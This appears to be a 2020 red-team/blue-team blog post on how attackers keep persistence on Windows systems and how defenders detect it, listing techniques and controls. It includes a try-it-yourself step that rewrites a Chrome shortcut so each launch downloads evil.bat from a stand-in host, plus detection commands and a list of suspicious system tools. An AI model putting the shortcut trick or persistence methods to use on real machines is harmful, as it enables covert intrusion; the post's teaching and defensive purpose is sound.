Maintain Local Persistence

Published in

Redteam & Blueteam Series

5 min readMay 3, 2020

Once the attacker exploits the system he tries to maintain a foothold/persistence. Persistence is any access, action, or configuration change to a system that gives an adversary a persistent presence on that system. Adversaries will often need to maintain access to systems through interruptions such as system restarts, loss of credentials, or other failures that would require a remote access tool to restart or alternate backdoor for them to regain access.

Red Team: Attack vectors and Techniques

Maintain a foothold to perform additional tasks such as installing and/or modifying services, modifying code or adding startup code to connect back to the compromised system. Attacker can maintain persistence of a compromised system in a number of ways.

Registry — This is like a homeland for most of persistence attacks, i have noted every single registry location which I came across during my threat hunting process and for performing persistence activities.
Services (Local and Remote)
Scheduled Tasks/Cron Jobs — Advantage of Windows Task Scheduler is it bypass User Account Control(UAC) if the user has access to its graphical interface. This is possible because the security option runs with the system’s highest privileges.
Application Autoruns/Startup locations/Logon Scripts
Drivers — Kernel modules, these kind of persistence techniques was most of Rootkits.

# exploited WannaCry Driver
PS-> (Get-Item c:\windows\system32\drivers\srv.sys).VersionInfo

System Firmware — BIOS, UEFI are system firmware that operate as software interface between the O.S and hardware of a computer. Sophisticated attackers installs malicious firmware updates as a means to maintain foothold. These are hard to detect, In 2019 Kaspersky released an article an ASUS firmware attacks.
Browser Extensions — Malicious extensions masquerading as legitimate extensions. This technique is also used in Defense Evasion, C&C.
.bash_profile and .bashrc
Hijacking COM
Hooking — Abusing dll, API, functions for persistence.
Custom Providers (SSP, SIP &Trust Hijacking) — Abusing Security Support Provider(SSP), Abusing Digital signature trust provider.
Software Components — 3rd party free ware tools like Adobe flash player, Avast A.V tools
WMI Event Trigger — Adversaries execute arbitrary code when specific event occurs, WMI scripts are compiled into .MOF files to evade detection.
Kerberos Golden Ticket — An A.D persistence mechanism wherein it requires full domain compromise. Used for both persistence and pivoting
Kerberos Silver Ticket — An A.D persistence mechanism wherein it requires service hash. Used for persistence and escalation.
Web Shell/Web Script — Web shell is a script that can be uploaded to a web server to enable remote administration on the server. Web shell is also used to pivot further to internal hosts.

Basic payload that was used in China chopper

Since there are multiple tactics adversaries can abuse of ,to be more detailed I would suggest to go through the MITRE ATT&CK.

Eg: Malwares like Powerliks use Registry for persistence, China Chopper used Web Shell

Basic persistence mechanism by changing handler : if you want to try, Replace the shortcut file location to download path location, So here every time victim opens chrome, evil.bat will be downloaded
“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” http://Bottle.com/Downloads/evil.bat. There are ways you can still make this less noisy.

In fact attacker after maintaining persistence based on his necessity can perform actions mentioned below.

i) Perform additional enumeration and system manipulation using management protocols and compromised with windows built-in tools like WinRM, WMI, SMB, SNMP.

ii) Performs ARP scans and ping sweeps

iii) Executes additional exploits

iv)Uses VPN to access the internal network

v) Conducts DNS and directory services enumeration

Vi) Performs Lateral movement

BLUE TEAM: Detective and Preventive Controls

No matter what area you are reviewing we cannot identify every possible thing that can go wrong, Control frameworks are impacted by many things, some of which we tend to ignore/forget as we do our analysis.

Below are the ways we need to approach for Detective and Preventive Controls.

Endpoint level:

Purchase Threat Detection & Prevention tools — Installing A.V tools mitigates the chance of machine getting compromised and if unfortunately happens, at least it will detect so that we can perform necessary actions to remediate. Registry has been my favorite place when doing threat hunting at endpoint level.

wmic startup list full -> Displays all the process that are at autostart locations.

wmic service list full |find /i “pathname” |find /i /v “system32” -> Look for any suspicious process running as services outside of system32 directory

2.Implementing File Integrity Monitoring Softwares

3. Implementing Secure Group Policies like a) Disallow Removable Media b)Restrict Software Installations c) Follow the principle of least privilege d) Control Access to CMD e) Disable Guest Account f) Password length g)Password age limit h) Disabling Anonymous SID Enumeration in A.D h) Moderating access to control panel i)preventing Browser extensions… I just mentioned few but there are many policies an organization can implement.

4. Installing security patches

5. Configuring AppLocker and Whitelisting and blacklisting applications based on organization dependency.

6. Implementing SIEM in an organization and integrating with other threat detection sources and monitoring those alerts. (If possible configure sysmon to SIEM, Configure SIEM in such a way to way generate alert/log if any of the registry keys changes.

7. Processes worth looking at endpoint level

WMIC, MSIEXEC, ICACLS, CSCRIPT,CERTUTIL, MSHTA,POWERSHELL, RUNDLL32, REGSVR32, SC, NETSH, NET, WSCRIP,WERFAULT.